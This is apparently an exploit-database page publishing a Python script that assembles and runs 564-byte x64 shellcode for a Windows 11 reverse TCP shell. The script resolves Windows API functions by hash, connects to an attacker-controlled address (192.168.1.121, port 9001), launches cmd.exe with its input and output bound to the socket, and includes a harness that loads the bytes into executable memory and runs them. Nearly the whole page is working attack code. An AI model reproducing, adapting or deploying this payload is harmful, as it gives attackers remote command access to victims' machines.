Windows 11 x64 - Reverse TCP Shellcode (564 bytes)



EKU-ID: 56158 CVE: OSVDB-ID:
Author: Victor Huerlimann Published: 2025-05-21 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python
# 
# Description: Windows 11 x64 Reverse TCP Shell
# Architecture: x64
# OS: Microsoft Windows
# Author: hvictor (Victor Huerlimann)
# Shellcode Size: 564 bytes
# Repository:https://github.com/hvictor/shellcode-x64
#
# Special thanks to wetw0rk (Milton Valencia), from whom I drew inspiration for the indicated parts of the code: https://github.com/wetw0rk/Sickle
#
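# Note: You will have to modify the `mov r9, ...` instruction in the call_connect section of the assembly below according to the attacker's IP and port:
# mov r9, 0x7901A8C029230002          # R9 = [IP = 192.168.1.121 | port = 0x2329 = 9001 | AF_INET = 2]
# Read from the most significant byte down, the immediate holds the IPv4 address (high DWORD), then the 2-byte port, then the 2-byte address family.
# The QWORD is stored little-endian, so each field is written byte-reversed in the immediate: 0x7901A8C0 lands in memory as C0 A8 01 79 (192.168.1.121)
# and 0x2923 lands as 23 29, i.e. port 0x2329 = 9001 in network byte order.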

import ctypes, struct
from ctypes import wintypes

from keystone import *
CODE = (
'''
start:
    mov rbp, rsp                        # RBP = stack pointer at entry: fixed base for the [rbp + 8] and [rbp - 8] scratch slots used below
    sub rsp, 1600                       # Reserve 1600 bytes of stack below RBP as working space

# Walk the loader module list until a module whose base name has 12 chars and starts with 'K' is found.
# On exit from the search loop, RBX = DllBase of that module (kernel32.dll according to the label).
resolve_kernel32:
    mov dl, 0x4b                        # dl = 'K'
    mov rcx, 0x60                       # RCX = 0x60, the GS-relative offset read on the next line
    mov r8, gs:[rcx]                    # R8 = address of PEB
    mov rdi, [r8 + 0x18]                # RDI = address of _PEB_LDR_DATA
    mov rdi, [rdi + 0x30]               # RDI = address of InInitializationOrderModuleList (first _LIST_ENTRY)
search:
    xor rcx, rcx                        # RCX = 0 so that CX can be used as the 16-bit NULL in the comparison below
    mov rbx, [rdi + 0x10]               # RBX = DllBase
    mov rsi, [rdi + 0x40]               # RSI = address of UNICODE string BaseDllName.Buffer
    mov rdi, [rdi]                      # RDI = address of the next _LIST_ENTRY
    cmp [rsi + 0x18], cx                # Compare the 16-bit char at byte offset 0x18 (char index 12, i.e. right after 12 chars) with NULL
    jne search                          # If length of BaseDllName is not 12 UNICODE chars, continue searching
    cmp [rsi], dl                       # Compare the first byte of the name (low byte of the first UNICODE char) with 'K'
    jne search                          # If the first UNICODE char is not 'K', continue searching
                                        # NOTE(review): the loop has no end-of-list check; it presumably relies on a matching module always being loaded

# jmp/call/pop sequence: obtains the run-time address of find_function without any absolute address.
find_function_jmp:
    jmp callback                        # Jump to callback to make a negative (null byte free) call to get_find_function_addr

get_find_function_addr:
    pop rsi                             # The address of find_function (return address pushed by the call in callback) is popped in RSI
    mov [rbp + 0x8], rsi                # The address of find_function is stored at (RBP + 8), which lies above the entry stack pointer
    jmp resolve_k32_sym                 # Once the address of find_function has been stored, proceed with the resolution of kernel32 symbols

callback:
    call get_find_function_addr         # When this call is done, the address of the 1st instruction find_function (add rsp, 8) is pushed to the stack
                                        # This is the address of find_function, and it will be popped in RSI (see get_find_function_addr).
                                        # Execution does not return here through ret: the return address is consumed by the pop above.
                
find_function:

# Resolves a list of name hashes against the export table of the module whose base address is in RBX.
# Reached through call [rbp + 8]. The caller pushes the hashes (one per QWORD) followed by a byte count
# equal to (number of hashes * 8) + 8. Each hash slot is overwritten with the address of the matching export,
# starting with the hash that was pushed first (highest address) and ending with the one pushed last.
# On return, RSP points at the slot that held the byte count (now -1) and the resolved addresses are at
# [rsp + 8], [rsp + 16], ... in the slots that held their hashes.
# Registers written: RAX, RCX, RDX, RSI, RDI. RBX and RBP are read but not modified.
#
# Stack layout once the add rsp, 8 below has executed (lowest address first):
#---------------------------------------------------------------------------
# QWORD: Return Address (addr of instruction after "call [rbp + 8]", see below)
# QWORD: Number of hash bytes + 8           <- RSP
# QWORD: <0x00000000> <Hash pushed last (4 bytes)>
# ...
# QWORD: <0x00000000> <Hash pushed first (4 bytes)>
# QWORD: first QWORD above the hashes (never read by this routine)
#---------------------------------------------------------------------------

    add rsp, 8                          # Point RSP to (Number of hash bytes + 8)
    pop rax                             # RAX = Number of hash bytes + 8
    push -1                             # Write -1 on the stack instead of (Number of hash bytes + 8): it is the end-of-list sentinel
    add rsp, rax                        # Add (Number of hash bytes + 8) to RSP: it now points just above the hash pushed first

# Current Stack Layout:
#---------------------------------------------------------------------------
# QWORD: Return Address
# QWORD: 0xffffffffffffffff
# QWORD: <0x00000000> <Hash pushed last (4 bytes)>
# ...
# QWORD: <0x00000000> <Hash pushed first (4 bytes)>
# QWORD: first QWORD above the hashes       <- RSP
#---------------------------------------------------------------------------
# From here on the hash currently being resolved is always at [rsp - 8], i.e. below RSP.

find_function_loop2:
    xor rax, rax                        # Clear RAX before it is used as an index below
    xor rdi, rdi                        # Clear RDI before the 32-bit load into EDI below
    mov eax, [rbx + 0x3c]               # EAX = offset to the PE Header of the module = e_lfanew
    mov edi, [rbx + rax + 0x88]         # EDI = RVA of the Export Directory Table of the module (1st field: VirtualAddress)
    add rdi, rbx                        # RDI = VMA of the Export Directory Table of the module
    mov ecx, [rdi + 24]                 # ECX = NumberOfNames (field of the Export Directory Table of the module)
    mov eax, [rdi + 32]                 # EAX = RVA of AddressOfNames (array of Name Addresses, field of the Export Directory Table)
    add rax, rbx                        # RAX = VMA of AddressOfNames
    mov [rbp - 8], rax                  # Save the VMA of AddressOfNames at (RBP - 8): this location is never touched for anything else

find_function_loop:
    dec ecx                             # Initially, ECX = NumberOfNames: decrement to get the index of the last name
                                        # NOTE(review): there is no check for ECX going below 0, so a hash with no matching export never terminates cleanly
    mov rax, [rbp - 8]                  # RAX = VMA of AddressOfNames
    mov esi, [rax + rcx * 4]            # ESI = RVA of the current Symbol Name
    add rsi, rbx                        # RSI = VMA of the current Symbol Name

compute_hash:
    xor rax, rax                        # RAX = 0
    cdq                                 # If the MSB of EAX = 1: EDX = 0xFFFFFFFF
                                        # If the MSB of EAX = 0: EDX = 0x00000000 -> fills EDX with the sign of EAX
                                        # In this case, EDX = 0x00000000 because EAX = 0x00000000

compute_hash_repeat:
    ror edx, 0xd                        # Rotate EDX right by 13 bits
    add edx, eax                        # EDX += current EAX value (the previously loaded char, 0 on the first iteration)
    lodsb                               # Load the byte pointed by RSI into AL and step RSI to the next byte (forward when DF = 0)
    test al, al                         # Test if the NULL terminator of the Symbol Name has been reached
    jnz compute_hash_repeat             # If the NULL terminator has been reached (ZF = 1), proceed to hash comparison
                                        # Else, perform the next iteration of the hash-computation algorithm
                                        # At this point, EDX contains the computed hash of the current symbol

find_function_compare:
    cmp edx, [rsp - 8]                  # Compare the computed hash with the hash of the wanted symbol (low DWORD of the slot below RSP)
    jnz find_function_loop              # If ZF = 0, the hash is different: proceed with the next name from AddressOfNames
                                        # If ZF = 1, the hash is equal: symbol found: continue hereby
    mov edx, [rdi + 36]                 # EDX = RVA of the AddressOfNameOrdinals array
    add rdx, rbx                        # RDX = VMA of the AddressOfNameOrdinals array
    mov cx, [rdx + 2 * rcx]             # CX = Symbol's Ordinal (lower 16 bits of ECX; the upper bits keep the name index bits, so this assumes index < 65536)
    mov edx, [rdi + 28]                 # EDX = RVA of the AddressOfFunctions array
    add rdx, rbx                        # RDX = VMA of the AddressOfFunctions array
    mov eax, [rdx + 4 * rcx]            # EAX = AddressOfFunctions[ordinal] = RVA of the wanted symbol
    add rax, rbx                        # RAX = VMA of the wanted symbol
    push rax                            # Push the wanted symbol's VMA onto the stack:
                                        # ATTENTION: The symbol's VMA overwrites its Hash on the stack!
    mov rax, [rsp - 8]                  # RAX = next slot below RSP: either the next hash to resolve or the -1 sentinel
    cmp rax, -1                         # If *(RSP - 8) is -1: ZF = 1: all wanted symbols have been resolved
    jnz find_function_loop2             # Until all wanted symbols have been resolved, continue looping

find_function_finish:                   # When we get here, all wanted symbols have been resolved: their VMAs are on the stack
    sub rsp, 16                         # Point RSP to the Return Address of find_function (skipping the -1 sentinel slot)
    ret                                 # Return: afterwards RSP points at the -1 sentinel, with the resolved VMAs right above it

# Push the hashes of the three kernel32 exports used later and let find_function replace them with addresses.
# RBX still holds the DllBase found by the search loop.
resolve_k32_sym:
    mov rax, 0x00000000ec0e4e8e         # Hash of LoadLibraryA
    push rax
    mov rax, 0x0000000016b3fe72         # Hash of CreateProcessA
    push rax
    mov rax, 0x0000000078b5b983         # Hash of TerminateProcess
    push rax
    mov rax, 32                         # RAX = 32 = 3 hashes * 8 bytes + 8
    push rax                            # Push 32 onto the stack (Number of hash bytes + 8)
    call [rbp + 8]                      # Call to find_function (see find_function above)
                                        # After return: [rsp + 8] = TerminateProcess, [rsp + 16] = CreateProcessA, [rsp + 24] = LoadLibraryA

# Build the string "ws2_32.dll" on the stack and pass it to LoadLibraryA. RAX = return value of LoadLibraryA.
load_ws2_32:
    mov rax, 0x0000000000006C6C         # 'll x00 x00 x00 x00 x00 x00' (reversed)
    push rax
    mov rax, 0x642E32335F327377         # 'ws2_32.d' (reversed)
    push rax
    mov rcx, rsp                        # Parameter 1 = address of "ws2_32.dll"
    sub rsp, 40                         # Create 40 bytes of room on the stack (presumably 32 bytes of shadow space plus 8 bytes of padding)
    call [rsp + 80]                     # Call LoadLibraryA: 80 = 40 (room) + 16 (string) + 24 (offset of the LoadLibraryA slot after find_function)
    nop
                                        # RSP is not restored here: the offsets used by the following stages account for these 56 bytes

# Resolve the three ws2_32 exports used later, then open a 512-byte gap below them for call arguments.
resolve_ws2_sym:
    mov rbx, rax                        # RBX = Base Address of ws2_32.dll (return value of LoadLibraryA, not checked for NULL)
    mov rax, 0x0000000060aaf9ec         # Hash of connect
    push rax
    mov rax, 0x00000000adf509d9         # Hash of WSASocketA
    push rax
    mov rax, 0x000000003bfcedcb         # Hash of WSAStartup
    push rax
    mov rax, 32
    push rax                            # Push 32 (Number of hash bytes + 8)
    call [rbp + 8]                      # Call find_function
                                        # After return: [rsp + 8] = WSAStartup, [rsp + 16] = WSASocketA, [rsp + 24] = connect

    sub rsp, 512                        # Move RSP down 512 bytes: the three pointers are now at [rsp + 520], [rsp + 528], [rsp + 536]
                                        # RSP stays at this value for every call below

# WSAStartup(0x202, rsp + 800). The return value in RAX is not inspected.
call_WSAStartup:
    mov rcx, 0x202                      # RCX = WinSock Version 2.2
    lea rdx, [rsp + 800]                # RDX = Address of output WSAData structure (the same address is reused for sockaddr_in later)
    call [rsp + 520]                    # Call WSAStartup

# WSASocketA(AF_INET, 1, 6, NULL, 0, 0). RAX = returned socket, not checked for failure.
call_WSASocketA:
    mov rcx, 2                          # Parameter af = 2 (AF_INET)
    mov rdx, 1                          # Parameter type = 1
    mov r8, 6                           # Parameter protocol = 6 (TCP)
    xor r9, r9                          # Parameter lpProtocolInfo = 0
    mov [rsp + 32], r9                  # 5th parameter (first stack slot) = 0: this is g in the documented WSASocketA parameter order
    mov [rsp + 40], r9                  # 6th parameter (second stack slot) = 0: this is dwFlags in the documented WSASocketA parameter order
    call [rsp + 528]                    # Call WSASocketA


# connect(socket, &sockaddr_in, 16). The socket is kept in RSI for the STARTUPINFOA handles below.
# The return value of connect is not inspected.
call_connect:
    mov rsi, rax                        # Save socket fd in RSI
    mov rcx, rax                        # RCX = Parameter s = socket fd created with WSASocketA
    mov r8, 16                          # R8 = Parameter namelen = 16

    # Preparation of the sockaddr_in structure on the stack:
    # struct sockaddr_in {
    #   QWORD: [sin_addr (4 bytes) | sin_port (2 bytes) | sin_family (2 bytes)]   (fields listed from most to least significant byte)
    #   QWORD: sin_zero = [00000000 00000000]
    # }
    # The QWORD is stored little-endian, so in memory the order is sin_family, sin_port, sin_addr,
    # and the port bytes 23 29 read as 0x2329 in network byte order.
    mov r9, 0x7901A8C029230002          # R9 = [IP = 192.168.1.121 | port = 0x2329 = 9001 | AF_INET = 2]
    lea rdx, [rsp + 800]                # RDX = Parameter name = Address of struct sockaddr_in (overwrites the start of the WSAData output)
    mov [rdx], r9                       # Write fields: sin_addr, sin_port, sin_family
    xor r9, r9
    mov [rdx + 8], r9                   # Write field sin_zero
    call [rsp + 536]                    # Call connect

# Thanks to wetw0rk (Milton Valencia) for his setup_STARTUPINFOA implementation:
# https://github.com/wetw0rk/Sickle/blob/master/src/sickle/payloads/windows/x64/shell_reverse_tcp.py
# Builds a zeroed _STARTUPINFO at (rsp + 800 + 0x300) whose three standard handles are the socket in RSI.
# RBX is reused here as the structure pointer; the ws2_32 base it held is no longer needed.
create_STARTUPINFOA:
    lea rdi, [rsp + 800]
    add rdi, 0x300                      # RDI = address of the _STARTUPINFO buffer
    mov rbx, rdi                        # RBX = same address, kept because rep stosd advances RDI
    xor eax, eax                        # EAX = 0: fill value for rep stosd
    mov ecx, 0x20                       # ECX = 0x20 DWORDs
    rep stosd                           # Zero-out 0x80 bytes (0x68 for _STARTUPINFO plus the 0x18 bytes that follow it)
    mov eax, 0x68                       # EAX = sizeof(_STARTUPINFO) = 0x68
    mov [rbx], eax                      # Field lpStartupInfo.cb = sizeof(_STARTUPINFO)
    mov eax, 0x100                      # EAX = STARTF_USESTDHANDLES
    mov [rbx + 0x3c], eax               # Field lpStartupInfo.dwFlags = STARTF_USESTDHANDLES
    mov [rbx + 0x50], rsi               # Field lpStartupInfo.hStdInput = socket fd
    mov [rbx + 0x58], rsi               # Field lpStartupInfo.hStdOutput = socket fd
    mov [rbx + 0x60], rsi               # Field lpStartupInfo.hStdError = socket fd

# Thanks to wetw0rk (Milton Valencia) for his call_CreateProcessA implementation:
# https://github.com/wetw0rk/Sickle/blob/master/src/sickle/payloads/windows/x64/shell_reverse_tcp.py
# CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, &STARTUPINFO, &PROCESS_INFORMATION).
# Parameters 5 to 10 are written to the stack slots [rsp + 0x20] .. [rsp + 0x48].
call_CreateProccessA:
    xor rax, rax
    xor rcx, rcx                        # Parameter lpApplicationName = 0
    lea rdx, [rsp + 800]                # Parameter lpCommandLine
    add rdx, 0x180                      # RDX = rsp + 800 + 0x180: buffer for the command line string
    mov eax, 0x646d63                   # EAX = "cmd" (the upper bytes of RAX are zero and act as the terminator)
    mov [rdx], rax                      # Write "cmd" in the lpCommandLine parameter (8 bytes: the string followed by zero bytes)
    xor r8, r8                          # Parameter lpProcessAttributes = 0
    xor r9, r9                          # Parameter lpThreadAttributes = 0
    xor rax, rax
    inc eax
    mov [rsp + 0x20], rax               # Parameter bInheritHandles = 1
    dec eax
    mov [rsp + 0x28], rax               # Parameter dwCreationFlags = 0
    mov [rsp + 0x30], rax               # Parameter lpEnvironment = 0
    mov [rsp + 0x38], rax               # Parameter lpCurrentDirectory = 0
    mov [rsp + 0x40], rbx               # Parameter lpStartupInfo = address of _STARTUPINFO
    add rbx, 0x68
    mov [rsp + 0x48], rbx               # Parameter lpProcessInformation = output address, right after _STARTUPINFO
    call [rsp + 616]                    # Call CreateProcessA: 616 = 512 + 88 + 16, the CreateProcessA slot filled by the first find_function call

# TerminateProcess(-1, 0): ends the process that is running this code.
call_TerminateProcess:
    xor rcx, rcx
    dec rcx                             # Parameter hProcess = -1 = this process
    xor rdx, rdx                        # Parameter uExitCode = 0 (graceful termination)
    int3                                # NOTE(review): software breakpoint, looks like a debugging leftover; it raises a breakpoint exception before the call below - confirm it is intended
    call [rsp + 608]                    # Call TerminateProcess: 608 = 512 + 88 + 8, the TerminateProcess slot filled by the first find_function call
'''
)


# Assemble the embedded source with a Keystone engine configured for x86, 64-bit mode.
ks = Ks(KS_ARCH_X86, KS_MODE_64)
encoding, count = ks.asm(CODE)

# Render every assembled byte as a "\xNN" escape so the output can be pasted into a string literal.
instructions = "".join("\\x{0:02x}".format(int(byte_value)) for byte_value in encoding)

print('Opcodes = ("' + instructions + '")')
print("Size: {} bytes.".format(len(encoding)))

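# Execution harness: the code below loads the assembled bytes into this process and runs them (Windows only).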

# Preparation of WSAStartup (not included in the shellcode)
# Define necessary structures and constants
class WSADATA(ctypes.Structure):
    """ctypes mirror of the Winsock ``WSADATA`` structure that WSAStartup fills in.

    The Windows headers declare the members in a different order depending on
    the target: on 64-bit builds ``iMaxSockets``, ``iMaxUdpDg`` and
    ``lpVendorInfo`` come directly after the two version words, while on 32-bit
    builds they follow the two character arrays. ``iMaxSockets`` and
    ``iMaxUdpDg`` are ``unsigned short`` in both layouts. The layout is chosen
    from the pointer size of the running interpreter so that every field is
    read from the offset Winsock actually writes it to.
    """

    if ctypes.sizeof(ctypes.c_void_p) == 8:
        # 64-bit layout.
        _fields_ = [
            ("wVersion", wintypes.WORD),
            ("wHighVersion", wintypes.WORD),
            ("iMaxSockets", wintypes.USHORT),
            ("iMaxUdpDg", wintypes.USHORT),
            ("lpVendorInfo", ctypes.POINTER(ctypes.c_char)),
            ("szDescription", wintypes.CHAR * 257),   # WSADESCRIPTION_LEN + 1
            ("szSystemStatus", wintypes.CHAR * 129),  # WSASYS_STATUS_LEN + 1
        ]
    else:
        # 32-bit layout.
        _fields_ = [
            ("wVersion", wintypes.WORD),
            ("wHighVersion", wintypes.WORD),
            ("szDescription", wintypes.CHAR * 257),   # WSADESCRIPTION_LEN + 1
            ("szSystemStatus", wintypes.CHAR * 129),  # WSASYS_STATUS_LEN + 1
            ("iMaxSockets", wintypes.USHORT),
            ("iMaxUdpDg", wintypes.USHORT),
            ("lpVendorInfo", ctypes.POINTER(ctypes.c_char)),
        ]

# Bind ws2_32.dll through ctypes' windll loader.
ws2_32 = ctypes.windll.ws2_32

# Tell ctypes how to marshal a WSAStartup call:
#   return value - an INT status code
#   argument 1   - WORD holding the requested Winsock version (e.g. 0x0202 for Winsock 2.2)
#   argument 2   - pointer to the WSADATA structure that receives the implementation details
ws2_32.WSAStartup.restype = wintypes.INT
ws2_32.WSAStartup.argtypes = (wintypes.WORD, ctypes.POINTER(WSADATA))

def call_wsastartup():
    """Initialise Winsock 2.2 for this process and return the filled WSADATA.

    Returns:
        The WSADATA instance populated by WSAStartup.

    Raises:
        RuntimeError: if WSAStartup returns a non-zero error code.
    """
    # Request version 2.2 (0x0202)
    version_requested = 0x0202

    # Create an instance of WSADATA to hold the output
    wsadata = WSADATA()

    # Call WSAStartup
    result = ws2_32.WSAStartup(version_requested, ctypes.byref(wsadata))

    if result != 0:
        raise RuntimeError(f"WSAStartup failed with error code {result}")

    # In a Winsock version WORD the low-order byte is the major version and
    # the high-order byte is the minor version, so print low byte first.
    print(f"WSAStartup succeeded. Winsock version: {wsadata.wVersion & 0xFF}.{wsadata.wVersion >> 8}")
    return wsadata

call_wsastartup()

# Pack each assembled value into one unsigned byte and collect the result in a
# mutable buffer, which ctypes' from_buffer() needs further down.
sh = b"".join(struct.pack("B", e) for e in encoding)
shellcode = bytearray(sh)

# Allocate executable memory for the shellcode.
# VirtualAlloc returns a pointer. Without an explicit prototype ctypes treats the
# return value as a C int, which cannot hold a 64-bit address, so declare it.
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_void_p
ctypes.windll.kernel32.VirtualAlloc.argtypes = [ctypes.c_void_p,
                                                ctypes.c_size_t,
                                                wintypes.DWORD,
                                                wintypes.DWORD]
ptr = ctypes.windll.kernel32.VirtualAlloc(0x10000000,      # requested base address
                                          len(shellcode),
                                          0x3000,          # MEM_COMMIT | MEM_RESERVE
                                          0x40)            # PAGE_EXECUTE_READWRITE
if not ptr:
    # The requested address range may already be in use; stop instead of copying to NULL.
    raise ctypes.WinError()

# Expose the shellcode bytes as a ctypes buffer `buf`
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

# Copy the shellcode into the allocated memory (pointer-width safe)
ctypes.memmove(ptr, buf, len(shellcode))

print("Shellcode: Short Reverse Shell")
print("Shellcode address = %s" % hex(ptr))
input("\n[?] Press Enter to execute the shellcode: ")

# Run the shellcode in a new thread and wait for that thread to finish.
# Handles and pointers are pointer-sized, so declare the prototypes instead of
# passing them through ctypes.c_int.
ctypes.windll.kernel32.CreateThread.restype = wintypes.HANDLE
ctypes.windll.kernel32.CreateThread.argtypes = [ctypes.c_void_p,                 # lpThreadAttributes
                                                ctypes.c_size_t,                 # dwStackSize
                                                ctypes.c_void_p,                 # lpStartAddress
                                                ctypes.c_void_p,                 # lpParameter
                                                wintypes.DWORD,                  # dwCreationFlags
                                                ctypes.POINTER(wintypes.DWORD)]  # lpThreadId
thread_id = wintypes.DWORD(0)
ht = ctypes.windll.kernel32.CreateThread(None,
                                         0,
                                         ptr,
                                         None,
                                         0,
                                         ctypes.byref(thread_id))
if not ht:
    raise ctypes.WinError()

ctypes.windll.kernel32.WaitForSingleObject.restype = wintypes.DWORD
ctypes.windll.kernel32.WaitForSingleObject.argtypes = [wintypes.HANDLE, wintypes.DWORD]
ctypes.windll.kernel32.WaitForSingleObject(ht, 0xFFFFFFFF)  # 0xFFFFFFFF = INFINITE (same bits as the original -1)